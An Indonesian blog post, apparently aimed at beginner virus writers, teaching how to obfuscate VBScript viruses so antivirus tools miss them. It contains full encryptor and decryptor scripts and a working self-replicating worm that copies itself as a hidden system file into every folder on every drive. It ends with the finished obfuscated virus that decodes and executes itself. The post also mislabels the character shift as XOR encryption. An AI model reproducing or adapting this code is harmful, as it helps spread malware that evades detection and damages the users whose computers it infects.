Social Icons

Sunday, January 3, 2016

Teknik Enkripsi Virus VBS


Melihat banyaknya email dan forum yang menanyakan cara mengenkripsi virus vbs atau js,maka saya mau menulis tutorial cara mengenkripsi virus vbs. Bila anda menggunakan program atau script encrypter maka virus kamu akan didetect oleh antivirus sebagai Encrypter.Tools atau Encrypter.Gen. Untuk itu saya akan memberitahu cara enkripsi sederhana dan kamu dapat memilih sendiri karakter ASCII nya.
Prinsip kerjanya begini, baca file perkarakter lalu ubah karakter demi karakter menjadi karakter ASCII(nomor ASCII +2). Jadi hasilnya, setiap huruf akan ditulis sebagai 2 huruf didepannya dalam tabel ASCII. Untuk unencrypt nya kamu cukup membalikan cara kerja encrypter tadi, yaitu mengurangkan karakter ASCIInya dengan 2. Lalu mengeksekusi yang telah di unencrypt tadi. Teknik ini disebut enkripsi XOR.Pusing ya.. hehehe saya juga pusing ;-) untuk meng enkripsi kamu harus mengubah semua karakter ” menjadi karakter ASCII lain, seperti ä,ö,æ,Æ,ô,ò dll. Tapi kamu harus tau berapa angka ASCIInya maka dari itu pertama kamu butuh table ASCII. ;Þ~
Pertama, ketikan script dibawah ini untuk membuat tabel ASCII. Nah kamu bisa memilih karakter ASCII sesuai pilihanmu.
01'<----------------- awal ASCII Tabel ---------------------->
02for i=0 to 256
03x=x+"angka "&i&" --> "&chr(i)&vbcrlf
04next
05 
06Set Anton = CreateObject("Scripting.FileSystemObject")
07Set hilman=anton.createtextfile("C:\ascii.txt")
08hilman.write x
09hilman.close
10'<----------------- akhir ASCII Tabel --------------------->
Lalu simpan dengan nama ascii.vbs dan jalankan. maka di drive C: akan terdapat file ascii.txt dan didalamnya terdapat angka beserta bentuk huruf ASCIInya dari 0 sampai 256(range ini bisa kamu pilih sendiri). Nah udah liat kan, sekarang buka virusmu ketik Ctrl+H(Replace). Isikan ” pada Find what dan ¤ pada Replace with. Klik Replace All dan Save. Kamu harus tau berapa angka ASCII ” dan ¤(caranya ya liat tabel tadi ;Þ)

angka 34 –> ”
angka 164 –> ¤
Catatan : “jangan memilih kode ASCII yang telah ada dalam virus kamu, karena bila di enkripsi maka akan ikut diubah menjadi tanda kutip(“).
Kedua, sekarang saatnya kita buat script encrypternya hehehe.. buka text editor kamu dan ketik script berikut :
01'<---------------- awal encryptor ---------------------->
02 Set Anton = CreateObject("Scripting.FileSystemObject")
03 Set maVero=Anton.OpenTextFile("C:\suriv.vbe")
04 virus=maVero.ReadAll
05 On Error Resume Next
06 VA3 = ""
07 For I = 1 To Len(virus)
08 Baca = Asc(Mid(virus, I, 1))
09 If Baca = 164 Then
10 'nah ini untuk karakter " yang kita tukar tadi..
11 'jadi, jika ditemukan karakter ASCII 164(¤) maka..
12 Tukar = Chr(215)
13 'ubah jadi karakter ASCII 215(×)
14 'nah selanjutnya terserah kamu, kalau kamu mau mengubah suatu huruf menjadi karakter ASCII yang
15 'spesial silahkan asal di catat dan di ingat.
16 ElseIf Baca = 10 Then
17 Tukar = Chr(28)
18 ElseIf Baca = 13 Then
19 Tukar = Chr(29)
20 Else
21 Tukar = Chr(Baca - 1)
22 End If
23 hasil=hasil & Tukar
24 Next
25 Set hilman=anton.createtextfile("C:\hasil.txt")
26 hilman.write hasil
27hilman.close
28'<----------------- akhir encryptor --------------------->
‘ini contoh file C:\suriv.vbe yang dipakai pada encryptor di atas.
01'<---------[ awal contoh kode yang akan di encrypt ]------------>
02On Error Resume Next
03Set ElkaUNP = CreateObject("Scripting.FileSystemObject")
04Set Padang = ElkaUNP.OpenTextFile(Wscript.ScriptFullName,1)
05Kode = Padang.ReadAll
06Set Drives = ElkaUNP.Drives
07For each Drive in Drives
08if Drive.isReady then
09Periksa(Drive & "\")
10End if
11Next
12Sub Periksa(Target)
13On Error Resume Next
14Set Elektronika = ElkaUNP.GetFolder(Target)
15SumBar = Target & "\ElkaUNP.vbs"
16if (SumBar <> "ElkaUNP.vbs") then
17Set FT_UNP = ElkaUNP.CreateTextFile(SumBar)
18FT_UNP.Write Kode
19FT_UNP.Close
20FT_UNP = ""
21Set Atribut = ElkaUNP.GetFile(SumBar)
22Atribut.Attributes = 35
23SumBar = "ElkaUNP.vbs"
24End if
25For Each SubFolder in Elektronika.SubFolders
26Periksa(SubFolder.Path)
27Next
28End Sub
29'<---------[ akhir contoh kode yang akan di encrypt ]------------>
Pada script diatas ada 3 karakter yang saya ubah jadi karakter ASCII. yaitu karakter :
164 jadi 215
10 jadi 28
13 jadi 29
(liat aja di tabel..;Þ~ huruf apa itu) dan selain yang tiga karakter itu, angka ASCII karakter-1(jika yang terbaca 40 maka diubah jadi chr(39) –> 40-1=39). Hasil file virus kamu yang telah di enkripsi akan ada di C:\Hasil.txt
Ketiga, copy isi file ‘C:\Hasil.txt’ dan buat script encrypter berikut ini :
01'<------------------- awal unencryptor --------------------->
02Explorer="pastekan isi file C:\Hasil.txt diantara tanda kutip ini. Nah karena tanda kutip ini lah
03saya menyuruh kamu menukar tanda kutip dengan yang lain, karena script tidak akan jalan kalau ada
043 atau 4 tanda kutip <img src="http://www.spyrozone.net/hacking/wp-includes/images/smilies/icon_wink.gif" alt=";-)" class="wp-smiley"> "
05Dim Microsoft
06For I = 1 To Len(Explorer)
07Internet = Asc(Mid(Explorer, I, 1))
08If Internet = 215 Then
09'jika menemukan karakter ASCII 215 maka
10Windows = Chr(34)
11'akan diubah menjadi tanda " kembali. sederhana kan..
12'selanjutnya hanya kebalikan dari encryptor diatas(jika 10 diubah jadi 28 maka sekarang di
13'kembalikan 28 jadi 10 <img src="http://www.spyrozone.net/hacking/wp-includes/images/smilies/icon_wink.gif" alt=";-)" class="wp-smiley">  dst
14ElseIf Internet = 28 Then
15Windows = Chr(10)
16ElseIf Internet = 29 Then
17Windows = Chr(13)
18Else
19Windows = Chr(Internet + 1)
20End If
21Microsoft = Microsoft & Windows
22Next
23 
24Set Anton = CreateObject("Scripting.FileSystemObject")
25Set hilman=anton.createtextfile("c:\hasilx.txt")
26hilman.write Microsoft
27hilman.close
28'<------------------ akhir unencryptor --------------------->
sekarang lihat file C:\hasilx.txt nah bandingkan dengan virus yang belum di enkrip, sama? kalau sama berarti tak ada error dalam enkripsinya.
Terakhir, tambahkan execute pada akhir unencryptor sehingga menjadi seperti dibawah ini:
01'<------------------ awal virus jadi --------------------->
02'badan virus
03Explorer="&;,,,,,,,,,Z `v`k bnmsng jncd x`mf `j`m ch dmbqxos \,,,,,,,,,,,,= Nm Dqqnq Qdrtld Mdws
04Rds Dkj`TMO < Bqd`sdNaidbs'×Rbqhoshmf-EhkdRxrsdlNaidbs×( Rds O`c`mf < Dkj`TMO-NodmSdwsEhkd'Vrb
05qhos-RbqhosEtkkM`ld+0( Jncd < O`c`mf-Qd`c@kk Rds Cqhudr < Dkj`TMO-Cqhudr Enq d`bg Cqhud hm Cq
06hudr he Cqhud-hrQd`cx sgdm Odqhjr`'Cqhud % ×[×( Dmc he Mdws Rta Odqhjr`'S`qfds(
07Nm Dqqnq Qdrtld Mdws Rds Dkdjsqnmhj` < Dkj`TMO-FdsEnkcdq'S`qfds( RtlA`q < S`qfds % ×[Dkj`TMO-
08uar× he 'RtlA`q ;= ×Dkj`TMO-uar×( sgdm Rds ES^TMO < Dkj`TMO-Bqd`sdSdwsEhkd'RtlA`q( ES^
09TMO-Vqhsd Jncd ES^TMO-Bknrd ES^TMO < ×× Rds @sqhats < Dkj`TMO-FdsEhkd'RtlA`q( @sq
10hats-@ssqhatsdr < 24 RtlA`q < ×Dkj`TMO-uar× Dmc he Enq D`bg RtaEnkcdq hm Dkdjsqnmhj`-RtaE
11nkcdqr Odqhjr`'RtaEnkcdq-O`sg( Mdws Dmc Rta &;,,,,,,,,,Z `jghq bnmsng jncd x`mf `j`m ch d
12mbqxos \,,,,,,,,,,,,= "
13'untuk unenkripsinya
14Dim Microsoft
15For I = 1 To Len(Explorer)
16Internet = Asc(Mid(Explorer, I, 1))
17If Internet = 215 Then
18Windows = Chr(34)
19ElseIf Internet = 28 Then
20Windows = Chr(10)
21ElseIf Internet = 29 Then
22Windows = Chr(13)
23Else
24Windows = Chr(Internet + 1)
25End If
26Microsoft = Microsoft & Windows
27Next
28'untuk mengeksekusi hasil unenkripsi
29Execute Microsoft
30'<------------------ akhir virus jadi --------------------->
Sekian dulu tuturial enkripsi virus VBS ini sebagai jawaban atas semua email yang
menanyakan encryptor untuk virusnya sendiri. Dengan sedikit kreatif kamu bisa membuat encryptor kamu sendiri dari pengembangan encryptor di atas. Tutorial ini juga sebagai jawaban atas kurang jelasnya cara mengenkripsi virus yang terdapat saat ini. Terutama pada para pemula yang ‘agak’ butuh penjelasan panjang lebar.
Greet’s to :
  • Indonesian Virus Writer dimana saja khususnya spidey yang suka membagi ilmunya hehehe.. :Þ~
  • SECTOR’S team,SevenC,dan pembuat virus VBS.Redlof dimanapun kamu berada.
  • Anak Warnet Payakumbuh(RiNaL,antho,alvin-s,peri,si bos,pak guru,yudi,ade dll)
  • MinangCrew, Kadal_Punk, Joehuntters, Aulia Abrar, Aldi_Member, Ridho(Elka02UNP), Adriyan, Bob dll.
  • Buat semua Anak Teknik Elektronika/Fakultas Teknik /UNP /Padang /SumBar /Indonesia.
  • Yance,Ee(toemis),Adek,Ata,Dodi(Bolot). hidup Payobasuang! dan yang tak tersebut namanya…
Salam.

//E.O.F

No comments:

 

PERHATIAN!!!Semua artikel yang diposting terlindungi....... Jika ingin Copy-Paste sertakan sumbernya :)